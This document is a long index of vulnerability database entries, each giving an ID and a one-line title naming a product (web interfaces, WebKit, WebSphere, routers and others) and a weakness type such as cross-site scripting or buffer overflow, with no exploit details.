[63927] Citrix Web Interface unspecified cross-site scripting
[63637] VMware Server VI Web Access interface directory traversal
[63451] JDownloader Webinterface source disclosure
[63339] Cisco Unified Videoconferencing Web interface session hijacking
[63338] Cisco Unified Videoconferencing Web interface unauthorized access
[60775] UPlusFtp Server Web interface buffer overflow
[59689] Trend Micro InterScan Web Security Virtual Appliance interface cross-site request forgery
[59455] Apple Mac OS X CUPS Web interface cross-site request forgery
[59056] Accoria Rock Web Server interface cross-site request forgery
[59053] Accoria Rock Web Server interface brute force
[58855] Cisco DPC2100 Web interface cross-site request forgery
[57221] IBM Web Interface for Content Management cookies unspecified
[57220] IBM Web Interface for Content Management unspecified cross-site scripting
[57019] Citrix Web Interface source disclosure
[56896] chumby Web interface command execution
[56490] CA eHealth Performance Manager Web interface cross-site scripting
[56389] LiteSpeed Web Server Admin interface cross-site scripting
[55712] Novatel MiFi Web interface cross-site request forgery
[54639] CA Service Desk Web interface cross-site scripting
[53069] BitTorrent and uTorrent Web interface denial of service
[52976] VMware Studio Web interface directory traversal
[52905] Xerox WorkCentre Web Services Extensible Interface Platform information disclosure
[52020] BEA WebLogic Administrative Interface
[51522] Huawei D100 Web and telnet interface default password
[50939] LogMeIn Pro Web interface cross-site request forgery
[50673] IPcelerate IPsession Web interface SQL injection
[50507] Transmission Web interface cross-site request forgery
[50191] Citrix Web Interface unspecified cross-site scripting
[49921] Apache ActiveMQ Web interface cross-site scripting
[49601] Nokia Siemens Flexi ISN Web interface security bypass
[49249] VLC Media Player Web interface status.xml input parameter buffer overflow
[46983] IBM Rational ClearCase Web interface cross-site scripting
[46773] CUPS Web interface weak security
[46625] Cobbler Web interface code execution
[46602] NETGEAR WGR614 Wireless DSL router Web interface denial of service
[46256] A-LINK WL54AP3 and WL54AP2 Web interface cross-site request forgery
[46135] Citrix Web Interface security bypass
[46118] KTorrent Web interface PHP code execution
[46117] KTorrent Web interface weak security
[46023] Sun Integrated Lights-Out Manager (ILOM) Web interface security bypass
[44995] Samsung DVR SHR2040 Web interface denial of service
[44885] PageR Enterprise Web interface directory traversal
[44874] Belkin Wireless G F5D7632-4V6 router Web interface security bypass
[44788] Dreambox DM500 Web interface denial of service
[44518] MailScan for Mail Servers Web administration interface security bypass
[44517] MailScan for Mail Servers Web administration interface cross-site scripting
[44514] MailScan for Mail Servers Web administration interface directory traversal
[43949] Multiple Century Systems routers Web interface cross-site request forgery
[43326] Novell Groupwise WebAccess simple interface cross-site scripting
[42769] Alt-N SecurityGateway Web interface buffer overflow
[42748] Xerox DocuShare dsweb interface cross-site scripting
[41328] IBM Rational ClearQuest Web interface cross-site scripting
[41171] Snom-320 SIP Phone Web interface unauthorized access
[41125] D-Link DI-524 router Web interface denial of service
[41052] Airspan WiMAX ProST Web interface security bypass
[40456] Intermate WinIPDS Web interface directory traversal
[40176] Xerox WorkCentre and WorkCentre Pro Web User Interface security bypass
[39252] VLC media player Web interface format string
[39123] Citrix Web Interface unspecified cross-site scripting
[38975] BarracudaDrive Web Server admin interface cross-site scripting
[38646] Citrix NetScaler Web management interface information disclosure
[38320] Cerberus FTP Server Web interface cross-site scripting
[38231] Multiple Avaya Messaging Products Web interface denial of service
[37216] NETGEAR ProSafe SSL VPN Concentrator 25 Web interface cross-site scripting
[36244] Bugzilla WebService (XML-RPC) interface information disclosure
[35665] Pay Roll - Time Sheet and Punch Card Application With Web Interface login.asp SQL injection
[35264] Fujitsu PRIMERGY BX300 Web interface information disclosure
[34773] Blue Coat K9 Web Protection Web management interface buffer overflow
[34254] TeamSpeak WebAdmin interface privilege escalation
[32940] AstroCam Web interface denial of service
[32876] Trend Micro ServerProtect for Linux Web interface information disclosure
[30781] J-OWAMP web interface JOWAMP_files/execInBackground.php command execution
[30775] J-OWAMP web interface JOWAMP_ShowPage.php file include
[30174] Network Administration Visualized Web interface code execution
[29056] Cisco IDS/IPS Web interface SSL denial of service
[28113] VMware ESX Server Web management interface cross-site request forgery
[27948] Siemens SpeedStream Web administrative interface denial of service
[27688] Cisco Router Web Setup (CRWS) IOS HTTP interface command execution
[27645] Juniper Networks DX Web interface cross-site scripting
[27225] Cisco CallManager Web interface cross-site scripting
[26123] OCE 3121/3122 Web management interface long URL denial of service
[25883] CiscoWorks WLSE Web interface archiveApplyDisplay.jsp cross-site scripting
[25325] BorderWare MXtreme Web administration interface unauthorized access
[23628] Nortel SSL VPN Web interface cross-site scripting
[23183] PowerChute Network Shutdown Web interface weak security
[18007] NETGEAR DG834G administrative Web interface denial of service
[16497] 3Com SuperStack 4400 Switches Web management interface denial of service
[15745] F-Secure Backweb user interface allows elevated privileges
[15001] SurgeFTP Web interface denial of service
[12723] HP Color LaserJet 4550 allows an attacker to gain access to Web administration interface
[12510] Axis Web interface of Axis 560 and Axis 5600+ print servers denial of service
[12306] SLMail administrative Web interface information disclosure
[11845] Sambar Server Pro Server WebMail interface transmits password and username in plain text
[11596] NETGEAR FVS318 Web interface denial of service
[11310] Abyss Web Server Web management interface brute force
[10793] Linksys EtherFast Web management interface multiple heap buffer overflows
[10792] Linksys EtherFast Web management interface multiple stack buffer overflows
[10319] SurfControl SuperScout Email Filter Administrative Web interface error message cross-site scripting
[10301] ArGoSoft Mail Server Pro Web mail interface cross-site scripting
[9703] D-Link DP-300+ Web interface POST request denial of service
[9564] Pingtel xpressa Web interface can be used to cause a denial of service
[9560] Novell NetMail Web interface ModWeb and WebAdmin buffer overflow
[9265] Red-M 1050AP access point Web interface insecure session
[9262] Red-M 1050AP access point Web interface denial of service
[9092] AstroCam Web administrative interface buffer overflow
[9083] Cisco CSS Web management interface invalid HTTP request denial of service
[9057] Cisco ATA-186 Web interface authentication bypass
[9056] Cisco ATA-186 Web interface could reveal sensitive information
[9054] Critical Path InJoin Directory Server Web administrative interface (iCon) could allow an attacker to view files
[9053] Critical Path InJoin Directory Server Web administrative interface (iCon) cross-site scripting
[8651] OpenKeyServer Web interface cross-site scripting
[8452] Oracle9i Application Server PL/SQL gateway administration Web interface has no authentication
[8300] BPM Studio Pro Web management interface "
[8299] BPM Studio Pro Web management interface DOS device request denial of service
[8261] Squid Web Proxy Cache HTCP interface is always enabled
[8260] Squid Web Proxy Cache SNMP interface denial of service
[8082] NETGEAR Gateway Router Web interface cross-site scripting
[7835] CacheOS insecure Web interface could allow a remote attacker to view sensitive information
[7203] PGP Keyserver denial of service using Web interface
[7022] Inetserv Webmail interface buffer overflow
[6631] Cisco CSS Web management interface authentication bypass
[6482] Tektronix PhaserLink Web server allows access to admin interface with no authentication
[5058] Sun Solaris AnswerBook2 Web interface could allow remote execution
[4123] Trend Micro OfficeScan Web interface allows unauthenticated users to perform administrative functions
[2288] CMail mail server Web interface can be used to verify system usernames
[2241] FTGate Web interface allows remote attackers to read files from the system
[2239] CMail Web interface can expose files
[1886] Cisco Web configuration interface can be crashed
[1845] Cisco equipment is configurable via a built-in Web interface
[86378] Google Chrome WebVTTParser::createDocumentFragmentFromCueText denial of service
[86377] Copy to WebDAV application for iPad and iPhone Index File Dir Listing module command execution
[86376] Copy to WebDAV application for iPad and iPhone Upload module file upload
[86375] Copy to WebDAV application for iPad and iPhone Upload module file include
[86356] Cisco Finesse interface information disclosure
[86326] Monster Menus module for Drupal mm_webform security bypass
[86315] RESTful Web Services module for Drupal multiple security bypass
[86289] TrustPort WebFilter help.php directory traversal
[86280] Mozilla Firefox, Thunderbird and SeaMonkey Web Workers security bypass
[86250] ownCloud Share Interface cross-site scripting
[86249] ownCloud user_webdavauth security bypass
[86234] Google Web Toolkit HTML files cross-site scripting
[86196] INSTEON Hub web and API authentication bypass
[86182] Cisco Unified Communications Manager User WebDialer page cross-site request forgery
[86177] Cisco Unified Communications Manager Web portal information disclosure
[86150] Cisco WebEx Meeting Center information disclosure
[86142] Cisco WebEx Meetings Server status security bypass
[86105] Siemens Scalance W-700 Series interface security bypass
[86050] GE Proficy HMI/SCADA - CIMPLICITY CimWebServer buffer overflow
[86037] WebDisk application for iPad and iPhone Index File Dir Listing module command execution
[85990] Symantec Web Gateway CVE-2013-4673 command execution
[85988] Symantec Web Gateway CVE-2013-4672 command execution
[85987] Symantec Web Gateway CVE-2013-4671 cross-site request forgery
[85986] Symantec Web Gateway blocked.php cross-site scripting
[85985] Symantec Web Gateway CVE-2013-1617 SQL injection
[85984] Symantec Web Gateway CVE-2013-1616 command execution
[85915] AutoWeb news.php SQL injection
[85874] Apache OFBiz Webtools View Log screen cross-site scripting
[85822] Roundcube Webmail identity configuration page cross-site scripting
[85783] Huawei E587 3G Mobile Hotspot Web UI cross-site scripting
[85782] Huawei E587 3G Mobile Hotspot Web UI command execution
[85707] Oracle Secure Global Desktop Web UI unspecified
[85706] Oracle Secure Global Desktop Web UI unspecified
[85674] Oracle Agile PLM Framework Web Client (CS) unspecified
[85666] Oracle Enterprise Manager Grid Control User Interface Framework unspecified
[85661] Oracle WebCenter Content Web Forms unspecified
[85660] Oracle WebCenter Content Site Studio unspecified
[85658] Oracle WebCenter Content Server unspecified
[85567] Intelligent Platform Management Interface information disclosure
[85566] Intelligent Platform Management Interface security bypass
[85520] Avira Analysis Web Service overview page SQL injection
[85512] dl Download Ticket Service REST interface cross-site request forgery
[85424] Cisco IronPort Web Security Appliance cross-site request forgery
[85392] Nameko Webmail nameko.php cross-site scripting
[85377] libvirt libvirtd virConnectListAllInterfaces denial of service
[85341] KENT-WEB CLIP-MAIL unspecified cross-site scripting
[85340] KENT-WEB POST-MAIL unspecified cross-site scripting
[85339] Juniper Junos J-Web command execution
[85285] Cisco Web Security Appliance CVE-2013-3386 denial of service
[85284] Cisco Web Security Appliance CVE-2013-3385 denial of service
[85283] Cisco Web Security Appliance CVE-2013-3384 command execution
[85282] Cisco Web Security Appliance command execution
[85162] Cisco WebEx Social cross-site request forgery
[85072] Facebook Mobile web application appreg.php open redirection
[85004] Angel Browser application for Android WebView class information disclosure
[85003] Galapagos Browser application for Android WebView class information disclosure
[84940] TESO Web default.asp SQL injection
[84929] KNet Web Server banned log parser denial of service
[84878] Resin Professional Web And Application Server file parameter information disclosure
[84875] Resin Professional Web And Application Server index.php cross-site scripting
[84833] FileMaker Pro and FileMaker Pro Advanced Instant Web Publish function cross-site scripting
[84795] Apple WebKit CVE-2013-1023 code execution
[84794] Apple WebKit CVE-2013-1013 security bypass
[84793] Apple WebKit CVE-2013-1012 cross-site scripting
[84766] Cisco WebEx Meetings Server information disclosure
[84685] Telaen webroot leak path disclosure
[84628] Webform module for Drupal components label cross-site scripting
[84624] IntraSrv Simple Web Server seh code execution
[84594] IBM WebSphere MQ CHLAUTH rule bypass
[84564] IBM WebSphere MQ mqm buffer overflow
[84529] Siemens Solid Edge ST5 WebPartHelper ActiveX control command execution
[84522] Cisco WebEx for iOS spoofing
[84384] web2py CVE-2013-2311 share.js cross-site scripting
[84374] Wireshark Websocket dissector denial of service
[84373] Wireshark Websocket dissector denial of service
[84362] IBM WebSphere Application Server process initialization privilege escalation
[84352] Stanford WebAuth header state information disclosure
[84340] Apple WebKit code execution
[84339] Apple WebKit code execution
[84338] Apple WebKit code execution
[84337] Apple WebKit code execution
[84336] Apple WebKit code execution
[84335] Apple WebKit code execution
[84334] Apple WebKit code execution
[84333] Apple WebKit code execution
[84332] Apple WebKit code execution
[84331] Apple WebKit code execution
[84330] Apple WebKit code execution
[84329] Apple WebKit code execution
[84328] Apple WebKit code execution
[84327] Apple WebKit code execution
[84326] Apple WebKit code execution
[84325] Apple WebKit code execution
[84324] Apple WebKit code execution
[84323] Apple WebKit code execution
[84322] Apple WebKit code execution
[84321] Apple WebKit code execution
[84295] MiniWeb Content-Length header denial of service
[84270] Cisco WebEx Social security bypass
[84268] Cisco WebEx Social cross-site scripting
[84113] IBM Data Studio Web Console cross-site request forgery
[84063] NetApp OnCommand System Manager CVE-2013-3322 Halt/Reboot interface command execution
[84024] WeBid yourauctions_p.php SQL injection
[84023] WeBid loader.php file disclosure
[84012] Cisco WebEx Meetings information disclosure
[83999] Beat Websites beats.php SQL injection
[83988] Cisco Unified MeetingPlace and Cisco WebEx Meetings information disclosure
[83973] IBM Data Studio Web Console directory traversal
[83965] IBM WebSphere Application Server Administrative console information disclosure
[83871] IBM WebSphere Application Server Administrative console cross-site scripting
[83868] IBM WebSphere Cast Iron unauthorized access
[83742] All in One Webmaster plugin for WordPress HTTP request cross-site request forgery
[83714] MinaliC Webserver HTTP Post method buffer overflow
[83642] IcedTea-Web Plugin security bypass
[83640] IcedTea-Web Plugin security bypass
[83621] IBM WebSphere Portal trace file password disclosure
[83618] IBM WebSphere Portal HTTP response splitting
[83617] IBM WebSphere DataPower XC10 security bypass
[83609] IBM WebSphere Application Server OAuth cross-site scripting
[83607] pd-admin WebFTP Overview page cross-site scripting
[83581] Oracle Java WebStart ActiveX launchApp() code execution
[83568] Oracle Java JavaFX WebPage class code execution
[83530] Oracle GlassFish Server REST Interface unspecified
[83529] Oracle GlassFish Server ADMIN Interface unspecified
[83512] Oracle Primavera P6 Enterprise Project Portfolio Management Web Access unspecified
[83511] Oracle Primavera P6 Enterprise Project Portfolio Management Web Access unspecified
[83460] Oracle WebCenter Content Content Server information disclosure
[83459] Oracle WebCenter Content Content Server unspecified
[83458] Oracle WebCenter Sites WebCenter Sites HTTP header injection
[83457] Oracle WebCenter Content Content Server denial of service
[83456] Oracle WebCenter Capture Import Server denial of service
[83454] Oracle WebLogic Server WebLogic Console unspecified
[83453] Oracle WebLogic Server WebLogic Console unspecified
[83452] Oracle WebCenter Interaction Image Service unspecified
[83451] Oracle WebCenter Content Content Server unspecified
[83449] Oracle COREid Access WebGate - WebServer plugin unspecified
[83448] Oracle HTTP Server Web Listener denial of service
[83446] Oracle Web Services Manager Web Services Security unspecified
[83426] KNet Web Server string buffer overflow
[83402] Free Monthly Websites file_io.php security bypass
[83377] RESTful Web Services module for Drupal page cache denial of service
[83319] MiniWeb filename parameter directory traversal
[83318] MiniWeb unspecified file upload
[83310] PowerTCP WebServer for ActiveX denial of service
[83286] TinyWebGallery image.php path disclosure
[83244] C2 WebResource fileview.asp cross-site scripting
[83208] Feedweb plugin for WordPress widget_remove.php cross-site scripting
[83205] Sophos Web Appliance cross-site scripting
[83204] Sophos Web Appliance directory traversal
[83203] Sophos Web Appliance command execution
[83182] Portal Web Services download_file.php response splitting
[83181] Portal Web Services contact.php cross-site scripting
[83173] RuggedCom Rugged Operating System Web API security bypass
[83150] RoundCube Webmail index.php file include
[83138] IBM WebSphere Application Server Web2.0 and mobile toolkit cross-site scripting
[83128] IBM Sterling Secure Proxy Web content spoofing
[83115] Moodle WebDav repository multiple security bypass
[83114] KNet Web Server string SEH buffer overflow
[83113] Atmail WebMail index.php cross-site scripting
[83083] Microsoft SharePoint and Microsoft Office Web Apps privilege escalation
[83057] Moodle WebDav repository lib.php information disclosure
[83053] PowerHawk 6320 meter web-based UI information disclosure
[83042] Splunk Web component unspecified cross-site scripting
[82991] RESTful Web Services module for Drupal HTTP request cross-site request forgery
[82968] askiaweb pgHistory.asp and pgadmin.asp scripts SQL injection
[82967] askiaweb AskiaExt.dll file cross-site scripting
[82954] Linux Kernel netlink interface information disclosure
[82942] Siemens SIMATIC WinCC TIA Portal HMI's web application cross-site scripting
[82931] Multiple NEC Aterm routers web-based management utility cross-site request forgery
[82905] Siemens Simatic WinCC Web server directory traversal
[82850] Apple WebKit CVE-2013-0961 code execution
[82849] Apple WebKit CVE-2013-0960 code execution
[82829] TIBCO Spotfire Web Player unspecified security bypass
[82828] TIBCO Spotfire Web Player unspecified cross-site scripting
[82762] IBM WebSphere Portal Web Content Manager cross-site scripting
[82760] IBM WebSphere Application Server directory traversal
[82759] IBM WebSphere Application Server security bypass
[82737] Web Cookbook searchrecipe.php cross-site scripting
[82736] Web Cookbook searchrecipe.php and showtext.php scripts SQL injection
[82697] IBM WebSphere Application Server cross-site scripting
[82696] IBM WebSphere Application Server denial of service
[82695] IBM WebSphere Application Server SSL security bypass
[82651] Google Chrome WebKit code execution
[82570] Google Chrome Web Audio implementation code execution
[82541] IBM WebSphere Commerce information disclosure
[82507] WebCalendar username information disclosure
[82501] Websense TRITON Unified Security Center web security module denial of service
[82500] Websense TRITON Unified Security Center web security module cross-site scripting
[82499] Websense TRITON Unified Security Center web security SQL injection
[82498] Websense TRITON Unified Security Center pages security bypass
[82497] Websense TRITON Unified Security Center web security security bypass
[82360] Apache HTTP Server manager interface cross-site scripting
[82356] webfs webfsd.log information disclosure
[82355] SkunkWeb sw.log information disclosure
[82349] Rix4Web add-site.php SQL injection
[82337] Dell PowerConnect interface denial of service
[82314] EasyWebScripts eBay Clone Script signinform.php CRLF injection
[82313] EasyWebScripts eBay Clone Script lostpassword.php, showcategory.php and signinform.php scripts cross-site scripting
[82311] EasyWebScripts eBay Clone Script gallery.php, product_desc.php and showcategory.php scripts SQL injection
[82275] Google Chrome web audio node code execution
[82252] Web Cookbook dumpdb.php directory traversal
[82250] Web Cookbook currid parameter SQL injection
[82233] IBM InfoSphere Information Server Web console cross-site scripting
[82221] IBM WebSphere DataPower Appliance echo web service cross-site scripting
[82184] Mozilla Firefox, Thunderbird, and SeaMonkey WebIDL code execution
[82174] Stoneware webNetwork multiple scripts cross-site scripting
[82057] Dell SonicWALL Scrutinizer fa_web.cgi scripts SQL injection
[82036] Roundcube Webmail data and vbscript URLs cross-site scripting
[81975] Puppet Administrator user interface cross-site request forgery
[81869] Opera Web browser SVG code execution
[81854] IBM Lotus Domino webadmin.nsf cross-site request forgery
[81853] IBM Lotus Domino webadmin.nsf cross-site scripting
[81839] Free Monthly Websites add_main_pages.php file upload
[81838] Free Monthly Websites index.php, login.php and file_io.php scripts security bypass
[81742] D-Link DCS Web Cameras docmd.htm command execution
[81739] D-Link DCS Web Cameras configuration file security bypass
[81733] SAP NetWeaver Web Application Server information disclosure
[81698] Cisco Network Admission Control Web authentication function cross-site scripting
[81693] Samba Samba Web Administration Tool cross-site request forgery
[81689] Opera Web Browser unspecified
[81569] Apple WebKit CVE-2013-0951 code execution
[81568] Apple WebKit CVE-2013-0958 code execution
[81566] Apple WebKit CVE-2013-0950 code execution
[81565] Apple WebKit CVE-2013-0956 code execution
[81564] Apple WebKit CVE-2013-0953 code execution
[81563] Apple WebKit CVE-2013-0959 code execution
[81561] Apple WebKit CVE-2013-0948 code execution
[81560] Apple WebKit CVE-2013-0968 code execution
[81559] Apple WebKit CVE-2013-0954 code execution
[81558] Apple WebKit CVE-2013-0955 code execution
[81556] Apple WebKit CVE-2013-0949 code execution
[81555] Apple WebKit CVE-2013-0962 cross-site scripting
[81554] Apple WebKit CVE-2013-0952 code execution
[81548] IBM WebSphere Application Server WS-Security spoofing
[81539] PHPWeby Free Directory Script options.php cross-site request forgery
[81538] PHPWeby Free Directory Script contact.php SQL injection
[81526] Cisco WebEx Social search information disclosure
[81503] Weboptima loginPass.php security bypass
[81502] Weboptima upload.php file upload
[81481] IBM InfoSphere Master Data Management Web content spoofing
[81477] SUSE WebYaST Hosts List information disclosure
[81471] Perforce P4Web multiple cross-site scripting
[81465] GE Proficy HMI/SCADA - CIMPLICITY CimWebServer command execution
[81464] GE Proficy HMI/SCADA - CIMPLICITY CimWeb directory traversal
[81440] myu-s and PHP WeblogSystem unspecified cross-site scripting
[81425] Adult Webmaster Script information disclosure
[81406] Cisco WebEx recordings security bypass
[81404] Cisco WebEx reservations security bypass
[81390] Cisco WebEx Social cross-site scripting
[81389] Cisco WebEx Training Center testingLibraryAction.do cross-site request forgery
[81367] DELL SonicWALL interface code execution
[81366] DELL SonicWALL GMS/Analyzer/ViewPoint interface security bypass
[81345] Barracuda Web Application Firewall unspecified cross-site scripting
[81291] Oracle Siebel CRM Highly Interactive Web UI information disclosure
[81267] Oracle Enterprise Manager User Interface Framework unspecified
[81251] Oracle Access Manager OAM Webgate unspecified
[81225] Apache CouchDB Futon user interface cross-site scripting
[81216] IBM Tivoli Storage Manager Web GUI authentication unauthorized access
[81149] WeBid validate.php SQL injection
[81114] GE Proficy HMI/SCADA - CIMPLICITY CimWebServer.exe denial of service
[81062] IBM WebSphere Message Broker wsdl support cross-site scripting
[81061] IBM WebSphere Cast Iron Solution LDAP security bypass
[81057] Webimage imagemane.php file upload
[81056] Concert Calendar add-on for WebsiteBaker view.php SQL injection
[81051] Concert Calendar add-on for WebsiteBaker view.php cross-site scripting
[81050] Advantech WebAccess HMI/SCADA Software gAddNew.asp cross-site scripting
[81016] IBM WebSphere Application Server servlet security bypass
[81015] IBM WebSphere Application Server Admin Console VMM cross-site scripting
[81014] IBM WebSphere Application Server Admin Console portlet cross-site request forgery
[81013] IBM WebSphere Application Server Admin Console type cross-site scripting
[81012] IBM WebSphere Application Server Admin Console login cross-site scripting
[80969] IBM Tivoli Endpoint Manager Web Reports cross-site scripting
[80962] Simple Webserver webserver directory traversal
[80957] Opera WebP image information disclosure
[80810] EMC Data Protection Advisor Web UI directory traversal
[80806] Novell iPrint Client op-client-interface-version code execution
[80788] Oracle Sun GlassFish Web Space Server Liferay component directory traversal
[80755] Kiwi Syslog Web Access multiple SQL injection
[80670] IBM Cognos TM1 Web multiple cross-site scripting
[80667] IBM WebSphere Message Broker DataFlowEngine denial of service
[80666] IBM WebSphere Message Broker message authentication bypass
[80629] IBM TRIRIGA Web content spoofing
[80613] Snare for Linux interface cross-site request forgery
[80604] Snare for Linux interface information disclosure
[80603] Snare for Linux interface cross-site scripting
[80593] RumahWeb config.xml file disclosure
[80590] Cisco DPC2420 interface cross-site scripting
[80578] Red Hat Certificate System interface cross-site scripting
[80559] KENT-WEB ACCESS REPORT unspecified cross-site scripting
[80558] KENT-WEB ACCESS REPORT unspecified cross-site scripting
[80537] IBM Tivoli Application Dependency Discovery Manager Welcome.do Web content spoofing
[80536] IBM Netezza Platform Software Web content spoofing
[80515] Google Chrome OS WebGL subsystem buffer overflow
[80464] PPLWebFinal plugin for WordPress proxyjobrestaurant.php file include
[80461] Fortinet FortiWeb multiple cross-site scripting
[80451] N-central main web cross-site request forgery
[80441] OurWebFTP index.php cross-site scripting
[80431] Webplayer theme for WordPress playlist.php SQL injection
[80418] TimelineJS_Nuweb plugin for WordPress get_posts_json.php file include
[80406] McAfee Email Gateway Secure Web Delivery Client cross-site scripting
[80405] McAfee Email Gateway Secure Web Delivery Client security bypass
[80394] Webmail Plus module for Drupal unspecified SQL injection
[80345] Horde Groupware Webmail Edition and IMP compose-dimp.js cross-site scripting
[80331] Google Web Toolkit unspecified cross-site scripting
[80276] Incomedia Website X5 Evolution checkaccess.php security bypass
[80275] Incomedia Website X5 Evolution imsearch.php cross-site scripting
[80257] Zingiri Web Shop plugin for WordPress ajaxfilemanager.php file upload
[80253] Beat Websites page_detail.php SQL injection
[80250] Webplayer plugin for WordPress config.php SQL injection
[80243] AionWeb swfupload_f8.swf cross-site scripting
[80238] Websense proxy filter security bypass
[80208] BIGACE Web CMS session hijacking
[80206] IBM WebSphere Commerce password information disclosure
[80185] Mozilla Firefox, Thunderbird, and SeaMonkey webgl bufferdata integer overflow
[80154] Opera Web browser error pages information disclosure
[80153] Opera Web browser HTTP responses buffer overflow
[80144] WeBid settings.php cross-site scripting
[80143] WeBid sell.php cross-site request forgery
[80140] WeBid loader.php directory traversal
[80121] Splunk Splunk Web component cross-site scripting
[80120] Splunk Splunk Web component cross-site scripting
[80081] RESTful Web Services module for Drupal HTTP request cross-site request forgery
[80072] WebKit WebCore security bypass
[80063] IBM WebSphere DataPower XC10 administrative function access denial of service
[80062] IBM WebSphere DataPower XC10 administrative privilege escalation
[79961] Webform CiviCRM Integration module for Drupal contact data security bypass
[79937] Weberknecht SSL spoofing
[79921] IBM WebSphere DataPower XC10 Appliance spoofing
[79920] IBM WebSphere MQ queue manager denial of service
[79914] Amazon Web Services SDK SSL spoofing
[79894] IcedTea-Web Plugin applet buffer overflow
[79876] MD-WEBMARKETING exibe.php cross-site scripting
[79875] MD-WEBMARKETING exibe.php and detalhes.php SQL injection
[79854] Agile FleetCommander and FleetCommander Kiosk interface cross-site request forgery
[79853] Agile FleetCommander and FleetCommander Kiosk Web page cross-site scripting
[79828] Opera Web browser unspecified
[79827] Opera Web browser SVG code execution
[79826] Opera Web browser unspecified
[79825] Opera Web Browser Data URIs cross-site scripting
[79824] Opera Web browser CORS security bypass
[79804] Change Passwords module for Webmin real name parameter cross-site scripting
[79745] Apple Safari WebKit SVG code execution
[79735] IBM WebSphere Commerce Web Services framework denial of service
[79722] Google Web Toolkit unspecified cross-site scripting
[79691] Microsoft .NET Framework Web proxy code execution
[79666] libunity-webapps code execution
[79656] Easy Webinar plugin for WordPress wid SQL injection
[79598] IBM WebSphere Application Server WASReqURL cross-site request forgery
[79570] Akiva WebBoard information disclosure
[79569] libsocialweb flickr server man-in-the-middle
[79566] WebTitan logs-x.php directory traversal
[79565] WebTitan tools.php command execution
[79564] WebTitan login-x.php and urls-x.php SQL injection
[79541] IBM WebSphere Application Server Liberty Profile cross-site scripting
[79539] IBM WebSphere Application Server Liberty Profile security bypass
[79330] Oracle Agile PLM Framework Web Client (CS) unspecified
[79317] Oracle WebCenter Sites ImagePicker unspecified
[79314] Oracle Imaging and Process Management Web information disclosure
[79313] Oracle Imaging and Process Management Web information disclosure
[79312] Oracle Imaging and Process Management Web unspecified
[79311] Oracle Imaging and Process Management Web unspecified
[79310] Oracle Imaging and Process Management Web information disclosure
[79307] Oracle Imaging and Process Management Web denial of service
[79306] Oracle Imaging and Process Management Web unspecified
[79305] Oracle Imaging and Process Management Web unspecified
[79303] Oracle WebCenter Sites Advanced UI SQL injection
[79302] Oracle WebCenter Sites Advanced UI cross-site request forgery
[79301] Oracle WebCenter Sites accounts security bypass
[79300] Oracle Imaging and Process Management Web unspecified
[79299] Oracle Business Intelligence webapp cross-site scripting
[79257] k5n WebCalendar multiple scripts cross-site scripting
[79233] IBM Lotus Domino Web server cross-site scripting
[79232] IBM Lotus Domino Web server open redirect
[79209] Multiple Mozilla products WebSockets code execution
[79203] FileBound FileBound Web service privilege escalation
[79195] Basic Webmail module for Drupal information disclosure
[79191] Basic Webmail module for Drupal email messages cross-site scripting
[79189] Basic Webmail module for Drupal page title cross-site scripting
[79188] Basic Webmail module for Drupal email address information disclosure
[79184] Cisco WebEx Player buffer overflow
[79183] Cisco WebEx Player buffer overflow
[79182] Cisco WebEx Player code execution
[79181] Cisco WebEx Player buffer overflow
[79180] Cisco WebEx Player buffer overflow
[79179] Cisco WebEx Player buffer overflow
[79169] Logica Hotscan SWIFT Alliance Interface TCP buffer overflow
[79099] Web Help Desk multiple cross-site scripting
[79059] MyWebSearch unspecified cross-site scripting
[79049] SAP Netweaver Mobile Infrastructure Web Console cross-site scripting
[79031] JBoss Web Services CBC information disclosure
[79015] PowerTCP WebServer for ActiveX denial of service
[78969] Novell GroupWise interfaces directory traversal
[78956] jigbrowser+ for Android WebView information disclosure
[78949] SilverStripe PageCommentInterface.php code execution
[78914] IBM WebSphere Portal directory traversal
[78889] Roundcube Webmail email subject cross-site scripting
[78867] IBM WebSphere Commerce personal data information disclosure
[78831] Google Chrome CVE-2012-2896 integer overflow in WebGL
[78726] IBM Rational Business Developer Web services information disclosure
[78725] Apple iOS WebKit CVE-2012-3747 code execution
[78688] Moodle lib.php web-service token security bypass
[78677] Cisco Secure Desktop WebLaunch code execution
[78674] Cisco Identity Services Engine (ISE) Administrator user interface cross-site request forgery
[78640] webERP WorkOrderEntry.php SQL injection
[78639] FreeWebshop setlang.php cross-site scripting
[78638] FreeWebshop index.php SQL injection
[78628] PayPal Website Payments Standard Module for osCommerce unspecified security bypass
[78601] GroupWise Internet Agent (GWIA) HTTP interface code execution
[78599] Novell GroupWise WebAccess merge parameter cross-site scripting
[78579] PacketFence web_node_register() code execution
[78577] WAGO I/O System Web Based Management default password
[78576] Webmin show.cgi cross-site request forgery
[78574] Websense V10000 large file denial of service
[78573] Websense V10000 denial of service
[78572] Websense Email Security Rules Service denial of service
[78571] Websense Email Security Receive Service security bypass
[78570] Websense Web Security and Web Filter Filtering Service denial of service
[78569] Cybozu KUNAI for Android WebView information disclosure
[78568] KUNAI Browser for Remote Service beta WebView information disclosure
[78560] Apple iTunes WebKit CVE-2012-3699 code execution
[78559] Apple iTunes WebKit CVE-2012-3704 code execution
[78558] Apple iTunes WebKit CVE-2012-3602 code execution
[78557] Apple iTunes WebKit CVE-2012-3703 code execution
[78556] Apple iTunes WebKit CVE-2012-3607 code execution
[78555] Apple iTunes WebKit CVE-2012-3648 code execution
[78554] Apple iTunes WebKit CVE-2012-3677 code execution
[78553] Apple iTunes WebKit CVE-2012-3623 code execution
[78552] Apple iTunes WebKit CVE-2012-3711 code execution
[78551] Apple iTunes WebKit CVE-2012-3675 code execution
[78550] Apple iTunes WebKit CVE-2012-3709 code execution
[78549] Apple iTunes WebKit CVE-2012-3712 code execution
[78548] Apple iTunes WebKit CVE-2012-3654 code execution
[78547] Apple iTunes WebKit CVE-2012-3617 code execution
[78546] Apple iTunes WebKit CVE-2012-3643 code execution
[78545] Apple iTunes WebKit CVE-2012-3624 code execution
[78544] Apple iTunes WebKit CVE-2012-3658 code execution
[78543] Apple iTunes WebKit CVE-2012-3706 code execution
[78542] Apple iTunes WebKit CVE-2012-3685 code execution
[78541] Apple iTunes WebKit CVE-2012-3700 code execution
[78540] Apple iTunes WebKit CVE-2012-3632 code execution
[78539] Apple iTunes WebKit CVE-2012-3673 code execution
[78538] Apple iTunes WebKit CVE-2012-3688 code execution
[78537] Apple iTunes WebKit CVE-2012-3705 code execution
[78536] Apple iTunes WebKit CVE-2012-3621 code execution
[78535] Apple iTunes WebKit CVE-2012-3651 code execution
[78534] Apple iTunes WebKit CVE-2012-3598 code execution
[78533] Apple iTunes WebKit CVE-2012-3622 code execution
